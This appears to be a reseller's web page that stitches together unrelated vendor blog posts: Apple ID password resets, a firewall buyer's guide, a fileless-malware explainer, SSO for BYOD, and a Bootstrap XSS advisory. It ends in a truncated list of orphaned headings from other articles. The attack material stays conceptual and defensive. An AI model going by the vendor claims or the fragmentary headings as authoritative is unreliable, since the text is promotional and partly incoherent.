In the next window, select “Change password.”
You will need to enter your device’s password.
You will be able to enter your new password in the next window. Then, select “Change” and “Done.”

How to reset your Apple ID password online

Go to appleid.apple.com
Click “Sign in” and select “Forgot password?”
Enter your email address or phone number, enter the CAPTCHA code, and click “Continue.”
You will receive a prompt to change your password on one of your Apple devices.

If you don’t have the device with you, you will have to either answer security questions or confirm your identity via email. If you are unable to do that, you will be asked to enter the 2FA recovery key to reset your password. You can create a new password only after you’ve confirmed your identity.

How to reset your Apple ID on a new device

During the setup of a new Apple device, you will be asked to enter your Apple ID.
Select “Forgot password or don’t have an Apple ID?”
Finish the setup of a new device.
As soon as the setup is complete, select an app that requires you to sign in to your Apple ID. On iPhone, iPad, or Apple Watch, you can simply select Messages. On a Mac, follow the instructions above.

What to do if the standard Apple ID reset methods haven’t worked for you

In case the outlined methods for resetting or changing your Apple ID password don’t work for you, there are still a few alternative strategies you can try. These methods can help you recover your account and regain access to all your Apple devices and services.

Check for devices already signed in with your Apple ID: If you have other Apple devices already signed in with your Apple ID, you can use one of those devices to reset your password. This can often be the quickest solution since it allows you to bypass additional verification steps.
Use recovery information: When setting up your Apple ID, you may have provided a recovery email address or phone number. If so, Apple can send you a verification code or reset link to help you regain access to your account.
Contact Apple Support: If you’ve tried the above methods without success, reaching out to Apple Support is your next best option. Apple Support can assist you in verifying your identity and recovering your account. While this might take a bit more time, it’s a reliable way to resolve the issue.

Best practices for managing and securing your passwords

To avoid the frustration of forgetting your Apple ID password in the future, we highly recommend adopting strong password management practices.

Create strong, complex passwords

Whenever you’re creating a password for a website, app, or service, remember that a strong password is a password that’s at least eight characters long and includes a healthy mix of uppercase and lowercase letters, numbers, as well as special characters. During password creation, it is also important to avoid using any easily guessable information such as your name or birthdate. If you’re looking for inspiration and practical tips for creating a strong and complex password, check out our Five Strong Password Ideas post.

Enable multi-factor authentication (MFA)

Beyond strong passwords, enabling multi-factor authentication (MFA) can further secure your accounts. MFA provides an extra layer of security by requiring a second form of verification in addition to the traditional username and password combination. This could be a code sent to your phone, a biometric scan, or a prompt on a trusted device.

Use a password manager

Finally, managing multiple strong passwords can be challenging and quite frustrating. This is where a password manager like NordPass can come in handy. NordPass simplifies password management and life online in general by offering a single secure place to safely store it all: passwords, passkeys, credit cards, personal information, secure notes, and more. On top of that, NordPass is designed to automatically save and fill in your credentials when you need to log in, saving you time and reducing the risk of password fatigue. NordPass for iOS even allows you to sync your passwords across all your devices, ensuring you have access to your digital valuables whenever, wherever. Even when you’re offline.

Start using passkeys instead of passwords

Passkeys are a new, convenient, and phishing-resistant way to sign up for and access apps, websites, and other various online services. In essence, a passkey is a digital login credential that uses your device—be it a phone, laptop, tablet, or desktop—to authenticate you instead of a traditional combination of a username and password. Cybersecurity experts see passkeys as the future of authentication technology, which will inevitably replace passwords. Tech giants such as Microsoft, Google, and Apple already allow users to opt for passkey-based authentication on their services. If you want to take your access security to the next level, we highly advise moving toward passkey-based authentication. To learn the ins and outs of setting up and using passkeys on your Apple devices, be sure to check out our latest blog entry on that exact topic.

By adopting these practices into your routine, you’ll significantly reduce the risk of unauthorized access to your accounts and minimize the stress of managing multiple passwords. Not only will your Apple ID be more secure, but you’ll also have the peace of mind of knowing that all your online accounts are protected.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About NordPass
NordPass is developed by Nord Security, a company leading the global market of cybersecurity products.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

Nord Security NordPass 2024

10 best network firewall solutions for businesses

Since the first commercial firewall in 1991, network security needs and technology have evolved significantly. While many businesses still use hardware firewalls, the rise of virtual network firewalls has made it easier to achieve the same functionality without the maintenance and complexity of physical firewalls.

Software firewalls offer effective network protection in a simpler, easier-to-manage way compared to hardware options. This article reviews our top 10 picks for software network firewalls to help you choose the best one for your business.

How we chose the best network firewall solutions (in our opinion)

We selected a range of network firewall options, including large enterprise solutions, mid-size businesses with similar features, and smaller companies that may not be as developed but still provide strong functionality. We didn’t go into too many details, but we focused on how well the firewall strengthens network security and how easy it is to set rules relating to the user interface. We also looked at the overall benefits of each firewall vendor and what types of clients they suit. We also considered cost-effectiveness and how comprehensive these solutions are.

We checked reviews and user feedback on sites like Gartner, G2, Reddit, and Capterra. We focused on what users said about cost, performance, next-generation firewalls, feature reliability, and how helpful the support teams were. If we found unusual feedback about a specific firewall provider that users often mention, we included it as well.

Key features to look for in a firewall

Focus on features that provide strong network protection while meeting the specific needs of your business. The right firewall solution should offer visibility, easy integration, and scalability to ensure nothing gets misconfigured as your company grows:

Visibility and control. A good firewall solution needs to provide deep insight into your network traffic and applications, especially for businesses needing access control to meet regulations. Next-generation firewalls with strong threat intelligence can help you stay compliant.
Easy integrations. Ensure the firewall provider offers solutions that integrate well with your current systems, like deep packet inspection tools or data centers. It should strengthen your overall network security by fitting smoothly with your other security features.
Updates and maintenance. Choose firewall vendors that provide regular updates and proactive product development. Focus on solutions that are frequently updated, well-maintained, and show consistent growth. Providers should offer public release notes, regular updates, and clear communication with customers. It’s crucial to ensure that security features stay current. Automated updates and clear versioning also reduce manual work for IT teams,
Hybrid network support. If your business operates across both on-premises and cloud setups, choose a firewall solution that supports hybrid infrastructures.
Scalability. As your business grows, your firewall solution should scale without significant cost increases. For example, as your setup becomes more complex, you’ll need more firewall rules. It’s wise to check the number of rules included in each plan before purchasing, as the cost difference between plans can sometimes be steep. This helps maintain strong network protection as your infrastructure expands.

When picking a firewall, focus on features that offer strong security and fit your setup. Prioritize solutions with automation features to reduce manual work. It will save time and help manage security across complex infrastructures.

How to choose the best firewall for your business

When picking the right firewall for your company, you need to weigh several important factors:

Security needs. Start by assessing your network security risks. If you’re a larger organization facing more threats, choose a next-generation firewall with a strong intrusion prevention system, advanced threat intelligence, and encryption to protect sensitive data across all layers. Smaller businesses should focus on essential features like packet filtering, malware defense, and network monitoring without overcomplicating the setup. Make sure the firewall solution aligns with the size and complexity of your network to avoid unnecessary costs or gaps in protection.
Ease of use. The firewall should be easy to deploy and manage, especially if your IT resources are limited. Network firewalls with simple, user-friendly interfaces can reduce the time spent on managing network protection. Opt for solutions that offer automation for tasks like network traffic monitoring, deep packet inspection, and access control to save time.
Support. Reliable customer support is crucial when setting up and maintaining a firewall. A firewall vendor that provides 24/7 support ensures issues are resolved quickly, minimizing downtime. If your business uses data centers or hybrid cloud setups, look for a vendor that offers proactive support to avoid misconfigurations and keep your security features running smoothly.
Cost. While the price is important, consider the long-term value. Cheaper options may lack the scalability and advanced features you’ll need as your business grows. Make sure the solution can scale with your business, especially if you expand your data centers or cloud environments, without incurring hefty costs when upgrading.
Compatibility. Ensure the firewall integrates seamlessly with your existing infrastructure, whether it’s cloud services, VPNs, or identity management systems. A firewall that works well with other security tools, such as intrusion prevention systems and threat management platforms, strengthens your overall network security and prevents integration issues.
Performance and scalability. As your business grows and network traffic increases, your firewall must be able to handle the additional load without sacrificing performance. Whether securing sensitive resources or managing remote access, the firewall should maintain consistent network protection and scale efficiently to meet your evolving needs.

Overall, different firewall solutions suit different business needs. Large options like Fortinet and Palo Alto are ideal for enterprises. Mid-sized businesses may find NordLayer or Perimeter 81 effective, while Todyl targets MSPs and MSSPs. Smaller options like Banyan Security fit smaller budgets. Choose based on your security needs and resources.

Disclaimer: The information in this article is provided for informational purposes only. It is based on publicly available third-party reviews, user feedback, and online sources accessed on September 6, 2024, and should not be considered definitive or permanent. While we strive for accuracy and completeness, Nord Security Inc. and its affiliates make no guarantees regarding the information’s accuracy, completeness, or suitability. We do not undertake, warrant, or represent that any product, or its feature, is or will remain publicly regarded as better or worse than other alternatives, serve any purpose, has mentioned features, benefits, strengths, and limitations for any period of time. Product features, pricing, and other details may change, and we advise readers to verify these directly with vendors. We disclaim any liability to any party for any errors, omissions, or actions taken based on this information. The inclusion of competitor products does not imply affiliation or endorsement, and all trademarks mentioned are the property of their respective owners. Readers should conduct their research and seek independent advice before making purchasing decisions.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

Nord Security NordLayer 2024

What is fileless malware and how to protect yourself

Some forms of malware are more sophisticated than others, using varying methods of compromise or evasion. Examples include ransomware, wipers, viruses, worms…designed to intrude upon unsuspecting digital victims to steal, damage, or destroy their data.

Fileless malware is one of those types that is highly evasive – only working within a computer’s memory, leaving no physical footprint on its hard drive.

With such a method of execution, does it mean that our devices are left vulnerable? Not quite.

What is fileless malware?

A common way many types of malware families work is that by opening a malicious attachment, you inadvertently enable the code to execute its dark magic, acting without the user’s knowledge.

Consequently, the code can infest different parts of the system, install other payloads such as keyloggers or other spyware, block access to files or apps, display malicious ads, and more. Think of it as a regular program that’s installed on your PC, just acting against your interests.

Fileless malware is a bit different. Instead of being stored on your computer’s drive, it acts maliciously exclusively after being loaded into a computer’s random-access memory (RAM) – except being less visible as it uses legitimate programs to compromise the computer, as opposed to regular malware, which leverages executable files to run itself (needs to be installed). This means that fileless malware is harder to detect since it has no footprint to speak of – it exists entirely in memory.

Essentially, fileless malware manipulates existing processes/tools for its agenda, as opposed to running a separate standalone ‘campaign’, also making it more persistent due to its ability to manipulate system features, abusing and hiding within them.

Did you know? The fileless beginning of viruses

The first computer virus for the PC, the Brain virus, infected floppy diskette boot sectors only, not files. Dating back to 1986, it was followed by many other floppy diskette (and hard disk drive) boot sector infectors like Form, and hard disk drive master boot record infectors like Stoned and Michelangelo. All of these were never contained in any file on the file system of the disk volume, just in system areas of the disk that were normally inaccessible to users, and subsequently in memory, once a system booted from infected media.

But you might ask, “Alright, but I still need to download it somewhere, no?” and you’d be right: in-memory ‘fileless’ malware is still delivered via malicious links or attachments; it’s just that the execution is different – fileless malware wants to evade detection as much as it can.

Examples of fileless malware

A well-known example of the use of fileless malware was within the Astaroth malware campaign (detected by ESET as Guildma), which had been using a fileless method (process injection) to operate an infostealer, originally delivered through a malicious email link. Upon interaction, the malware used legitimate Windows tools such as BITSAdmin, the Alternate Data Streams file attribute, and a utility of Internet Explorer (ExtExport.exe) for defense evasion (through DLL Side-loading).

In essence, it leveraged legitimate system processes and tools to run its code becoming detectable after being run in memory (by ESET as Win32/Spy.Guildma).

Similarly, the Kovter malware family, first detected by ESET Research in 2014, stored its malicious payload encrypted in the Windows registry, considered as fileless persistence. Likewise, GreyEnergy also made sure that some of its modules only ran in memory, hindering detection.

Such malware techniques are problematic for simple endpoint security software that works by scanning files on a system, lacking process or memory scanning capabilities. But this doesn’t mean that they cannot be detected.

Protecting against fileless threats

ESET Endpoint Security’s multilayered product features an Advanced Memory Scanner module, which, combined with our Exploit Blocker, protects against malware designed with evasiveness in mind. Additionally, thanks to different forms of Advanced Machine Learning employed within, detections are fine-tuned to offer the best detection rates.

Only memory scanning can successfully discover active in-memory fileless attacks that lack persistent components in the file system, such as was the case with Astaroth (Guildma) and its use of the Windows toolset.

Furthermore, the ESET Host-based Intrusion Prevention System (HIPS) and its Deep Behavioral Inspection (DBI) use predefined rules to scan for and monitor suspicious behavior related to running processes, files, and registry keys, targeting methods often used by fileless malware to obfuscate its activities. Hence, malware families like Kovter find it hard to hide from ESET Endpoint Security in the Windows registry, since the memory scanner also deals with encrypted threats.

Issue-less

With cybersecurity protections stepping up to protect people against advanced threats such as fileless malware, one thing still needs to be said: Never click on any malicious links or attachments in suspicious emails – even if they are from someone you know and trust.

First, via a different communications medium (e.g., text, phone, or in person for something received in email, etc.), reach out to the apparent sender and verify whether it’s really them who had sent the message, as well as their intent. While this might seem like a bit too much, social engineering has gotten rather complex, and can fool anyone quite easily.

As always, exploiting human error is the best avenue for a compromise, so stay informed by reading our ESET Blogs, WeLiveSecurity, and ESET Research on Twitter (now known as X) to keep ahead of the cyber threat game.

In addition, try our free ESET Cybersecurity Awareness Training to learn how to stay secure at all times.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About ESET
For 30 years, ESET® has been developing industry-leading IT security software and services for businesses and consumers worldwide. With solutions ranging from endpoint security to encryption and two-factor authentication, ESET’s high-performing, easy-to-use products give individuals and businesses the peace of mind to enjoy the full potential of their technology. ESET unobtrusively protects and monitors 24/7, updating defenses in real time to keep users safe and businesses running without interruption. Evolving threats require an evolving IT security company. Backed by R&D facilities worldwide, ESET became the first IT security company to earn 100 Virus Bulletin VB100 awards, identifying every single “in-the-wild” malware without interruption since 2003.

ESET 2024

Beyond Passwords: Securing Access on BYOD with Single Sign-On

How frustrating is managing multiple logins across devices during your workday? A lot, right? First, you’re constantly trying to remember multiple passwords. Then you face interruptions like password resets, multiple authentication prompts, or security checks every time you switch between your laptop, phone, or tablet, slowing down your productivity. This kind of friction is common in workplaces that have adopted Bring Your Own Device (BYOD) policies.

What about this on a company-wide scale? Employees waste time logging in repeatedly, managing passwords across multiple devices, or worse, reusing the same passwords across platforms. 44% or more of employees globally reuse passwords, which opens up significant security risks.^[1]For businesses dependent on BYOD, this is a ticking bomb of productivity loss and security vulnerabilities.

Securing BYOD Access With Single Sign-on SSO — Securing Access on BYOD with SSO

This is where Single Sign-On (SSO) comes in. With SSO, employees can securely log in just once, regardless of the device, and access all their authorized apps and systems without needing to enter passwords repeatedly.

By integrating BYOD with SSO, companies can save employees valuable time and reduce the risk of security breaches from weak or reused passwords.

The Impact and Downsides of a BYOD Setup

In a BYOD setup, employees often use multiple apps and services, each requiring its own password. This can lead to a lot of frustrations and lost productivity, not to mention lapses in security. When people have to remember so many passwords, they tend to pick weak ones or reuse them across different accounts. A staggering 81% of data breaches are linked to compromised passwords, according to Verizon.^[2] This makes the issue quite serious.

For IT teams, dealing with this password overload is no small task. Managing countless passwords, making sure they’re updated regularly, and handling password reset requests can be incredibly time-consuming. This not only increases the risk of security breaches but also frustrates employees, leading to lower productivity and more frequent IT support issues. The complexity of managing passwords in a BYOD environment can really take a toll on both security and efficiency.

Single Sign-On: Simplifying the User Experience

SSO is a master key that unlocks all the doors you need. Once logged in through an SSO system, users can access multiple applications without having to log in separately for each one.

How SSO Works:

Unified Access: Users authenticate once through a central login page and gain access to various applications and services. This means no more juggling multiple passwords or facing login barriers throughout the day.
Reduced Password Fatigue: By minimizing the number of passwords employees need to remember, SSO reduces the temptation to use weak or reused passwords. This simple change can significantly enhance overall security.
Streamlined User Experience: SSO provides a smoother and faster login process, enhancing productivity and reducing frustration. Employees can spend more time focusing on their work rather than dealing with login issues.

Consider an employee at a marketing firm who needs to access their email, project management tool, and CRM system. Without SSO, they would need to enter different credentials for each application, which can be time-consuming and error-prone. With SSO, a single login grants them access to all these systems, saving time and reducing the risk of login-related security issues.

How SSO Strengthens BYOD Security

Managing security across various devices and applications can be next to impossible in a BYOD environment, which is heavily fragmented by device/OS diversity. SSO offers a streamlined way to ensure secure access to corporate apps without compromising user experience.

By allowing employees to authenticate once and gain access to all necessary systems through a single set of credentials, SSO simplifies the login process and eliminates the need for multiple passwords. But beyond convenience, SSO provides critical security enhancements that address many of the vulnerabilities introduced by BYOD policies.

Here’s how SSO strengthens BYOD security:

Reduced Risk of Password Fatigue: By allowing employees to use just one set of credentials, SSO reduces the likelihood of weak or reused passwords, a common security risk. Fewer passwords mean fewer entry points for hackers.
Centralized Access Control: With SSO, IT teams have a single point of control to manage who can access which applications and resources. This means more consistent security policies across devices and the ability to monitor and adjust access in real time.
Improved Monitoring and Auditing: SSO systems typically include detailed reporting and monitoring features. IT can track who is accessing what, when, and from where, making it easier to identify suspicious activity or unauthorized access attempts.
Multi-Factor Authentication (MFA) Integration: SSO often works hand-in-hand with MFA, adding an extra layer of security. Even if someone gains access to an employee’s password, MFA ensures they can’t access systems without a second verification step, such as a fingerprint or one-time code.
Faster Response to Security Threats: With centralized access, IT teams can swiftly revoke or adjust permissions across all applications if a security threat is detected, preventing unauthorized access to sensitive information.

The Industry and Geographic Perspective on BYOD and SSO

The approach to BYOD and SSO varies across industries and regions, reflecting different challenges and strategies.

Industries

Healthcare: Protecting patient data is foremost in healthcare. SSO simplifies access to electronic health records (EHRs) and other medical systems, ensuring that healthcare professionals can efficiently access necessary information without compromising security. By centralizing login processes, enforcing SSO helps maintain security, in turn maintaining compliance with regulations like HIPAA while reducing the risk of unauthorized access.
Education: Educational institutions often have diverse user groups, including students, teachers, and administrative staff, all needing access to various platforms. SSO provides a unified access point, simplifying the login process and enhancing security across educational tools and systems. It also helps protect student identity online by managing access centrally.
Finance: The financial sector faces strict regulations and high-security requirements. SSO solutions here integrate with advanced security measures, such as MFA and risk-based authentication, to secure financial transactions and sensitive data. By streamlining access management, financial institutions can meet compliance requirements while protecting against fraud and unauthorized access.

Regional Variations

North America and Europe: These regions are at the forefront of adopting advanced security measures, including SSO and Zero Trust frameworks, particularly due to widespread BYOD policies. 73% of organizations in North America have a defined Zero Trust initiative in place, which heavily relies on secure access management strategies like SSO.^[3] The rise of remote work and stringent data protection laws, such as GDPR in Europe and the California Consumer Privacy Act, have further driven SSO adoption. As organizations prioritize securing both internal and external access, SSO has become essential in mitigating password-related risks and ensuring compliance.
Emerging Markets: The adoption of SSO is on the rise as BYOD policies and remote work become more commonplace in emerging markets. While cost and infrastructure limitations have historically slowed down initial adoption, the growth in demand for secure access management systems is undeniable. The global SSO market, valued at USD 3.51 billion in 2022, is expected to grow to USD 10.80 billion by 2031 at a CAGR of 13.3%.^[4] This indicates a broader trend of increasing reliance on SSO across various markets, including emerging ones. As these regions mature technologically, SSO will play an essential role in managing secure access, especially in BYOD environments where simplifying authentication across devices is required.

BYOD Security with Scalefusion OneIdP’s SSO

Whether it’s a BYOD setup or a traditional office environment, securing access across various devices is vital. Scalefusion helps enterprise IT teams enforce corporate policies on work apps and resources on BYO devices. Further with Scalefusion OneIdP’s SSO solution, IT teams can ensure that employees can securely access multiple apps with a single login, regardless of using personal laptops, smartphones, or tablets.

Scalefusion OneIdP simplifies user authentication and also strengthens security with centralized access control, integration with multi-factor authentication (MFA), and real-time access monitoring. This eliminates password fatigue, reduces entry points for attacks, and enhances productivity by ensuring that employees can access the tools they need quickly and securely.

Contact our experts and schedule a demo to learn more about Scalefusion OneIdP.

References:

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Scalefusion
Scalefusion’s company DNA is built on the foundation of providing world-class customer service and making endpoint management simple and effortless for businesses globally. We prioritize the needs and feedback of our customers, making sure that they are at the forefront of all decision-making processes. We are dedicated to providing comprehensive customer support services, and place emphasis on customer-centric thinking throughout the organization.

Scalefusion 2024

New Bootstrap Vulnerabilities to Watch

New Bootstrap vulnerabilities could spell trouble for those with websites or web apps running Bootstrap 3 or Bootstrap 4, which are end of life and no longer community-supported.

Keep reading to find out how these vulnerabilities can be exploited to engineer cross-site scripting (XSS) attacks and what to do to enhance your Bootstrap security.

Recently Disclosed Bootstrap Vulnerabilities: Who Is Impacted?

In July 2024, three vulnerabilities affecting end-of-life (EOL) versions Bootstrap were disclosed:

CVE-2024-6484

CVE-2024-6485

CVE-2024-6531

All three CVEs received a CVSS score of 6.4 from the National Vulnerability Database, indicating medium severity.

Learn more about CVEs and CVSS Scores >>

CVE-2024-6484 and CVE-2024-6485 impacts Bootstrap 3 and CVE-2024-6531 affects Bootstrap 4. If you have applications or websites running either of these EOL versions, you are at risk.

Back to top

How Do These Bootstrap Vulnerabilities Work?

CVE-2024-6484 and CVE-2024-6531 are identical cross-site scripting (XSS) vulnerabilities in the Bootstrap carousel component targeting different Bootstrap versions. This component allows you to define slide behavior of links in the carousel via “data” attributes. The exploit can be achieved if user-supplied values are provided for these attributes without adequate sanitization.

CVE-2024-6485 is a similar vulnerability, but targets the button plugin and its loading text state.

Consequences and Costs of a Cross-Site Scripting Attack

As defined by the Open Worldwide Application Security Project (OWASP), a cross-site scripting (XSS) attack is a vector by which a malicious script is injected into a website. These can be relatively trivial, and just inject new content or data into the website — or more nefarious, and transmit data, like session login information, to a third party under the attacker’s control.

Some examples of what can be accomplished via an XSS attack:

Form contents could be sent to a third party instead of the site, leading to leakage of PII or financial information.

A link could submit a form to a malicious site, returning data that the browser than assumes is trusted, but in fact contains and executes additional malicious code.

A session cookie could be hijacked and used by the attacker to gain access to the user session and data on the website. The attacker can now impersonate the user and gain access to their information, which might include PII or payment methods. If the user has admin privileges on the website, the attacker could gain access to administration tools, potentially changing any content on the site.

A script could modify site contents, such as a press release or blog post, providing false information to consumers and damaging the credibility of the site owner.

While XSS attacks have been known about and categorized for literally decades, they are still serious security concerns for web-based applications.

Back to top

Mitigation and How to Improve Bootstrap Security

There are a number of general measures you can take to mitigate XSS attacks. The most basic is to validate all user input, and use robust sanitization and normalization measures when rendering user-provided input to prevent script injection from occurring in the first place. Additionally, you can set things such as HttpOnly cookies, which prevents JavaScript from accessing cookies, and add Content Security Policy HTTP headers, which prevents third-party JavaScript.

However, when using third-party JavaScript frameworks such as Bootstrap, sometimes you cannot audit every bit of JS that your application executes.

In those cases, you can apply your own patch or migrate to the current version of Bootstrap, Bootstrap 5. If neither of those are possible, it is recommended to get long-term support through a commercial partner like OpenLogic so that you have access to patches when vulnerabilities affecting EOL versions are disclosed. OpenLogic has patched all three of these CVEs for our Bootstrap LTS customers.

Back to top

Final Thoughts

Once open source software reaches end of life, vulnerabilities become harder to deal with since you can’t rely on the community to provide a fix quickly. As described above, the fallout from XSS attacks can be somewhat minor (false information/vandalism to your site) or devastating (sensitive customer data stolen), so if you are running an older version of Bootstrap, it’s time to upgrade or make sure you have an LTS provider.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Perforce
The best run DevOps teams in the world choose Perforce. Perforce products are purpose-built to develop, build and maintain high-stakes applications. Companies can finally manage complexity, achieve speed without compromise, improve security and compliance, and run their DevOps toolchains with full integrity. With a global footprint spanning more than 80 countries and including over 75% of the Fortune 100, Perforce is trusted by the world’s leading brands to deliver solutions to even the toughest challenges. Accelerate technology delivery, with no shortcuts.

OpenLogic 2024

What is Scalefusion FileDock?

FileDock’s Primary Function

Core Features

a. Secure Content Upload and Distribution

b. Content Categorization

c. User-friendly Interface

d. Advanced Security Features

e. Remote Management Capabilities

f. Presentation Mode for Digital Signage

Content Management with FileDock

1. Empowering IT Administrators

2. Streamlined Content Delivery

3. Real-Time Updates

4. Enhanced Security Protocols

5. Granular Control with File Expiry

6. Customized Download Locations

7. Comprehensive Audit Trails

Real-world Applications of FileDock App

1. Healthcare

2. Education

3. Retail

4. Vehicle Fleet Management

5. Corporate Offices

The Future is Now with Scalefusion FileDock

In the beginning (abridged)

Not remotely secure

Information disclosure

Brute force attacks

Denial of service

Machine-in-the-Middle

Shoring up defenses

Real world impact of NLA by default

Using runZero to audit RDP configurations

Attributes of interest

A glance into the near future

Final Thoughts

Frontend-only UI development

Emphasizing the backend’s role

The goal of backend-driven UI

The benefits of backend-driven UI

The cons of backend-driven UI

Uneven developer distribution

High cost

Sanity check: Is BDUI for you?

How much should you commit initially?

Are we inventing HTML again?

Do we have the foundation to implement a backend-driven UI?

Big Tech and backend-driven UI

Before you reset your Apple ID password

How to reset your Apple ID password on iPhone and iPad

How to reset your Apple ID password on a Mac

How to reset your Apple ID password online

How to reset your Apple ID on a new device

What to do if the standard Apple ID reset methods haven’t worked for you

Best practices for managing and securing your passwords

Create strong, complex passwords

Enable multi-factor authentication (MFA)

Use a password manager

Start using passkeys instead of passwords

How we chose the best network firewall solutions (in our opinion)

Top 10 network firewall solutions, in our opinion

1. NordLayer

Benefits:

Drawbacks:

2. Cato SASE Cloud

Most mentioned overall product benefits:

Drawbacks:

3. Fortinet: FortiGate VM

Most mentioned overall product benefits:

Drawbacks:

4. Palo Alto VM Series

Most mentioned overall product benefits:

Drawbacks:

5. Cloudflare WAF

Most mentioned overall product benefits:

Drawbacks:

6. ZScaler Internet Access

Most mentioned overall product benefits:

Drawbacks:

7. Appgate SDP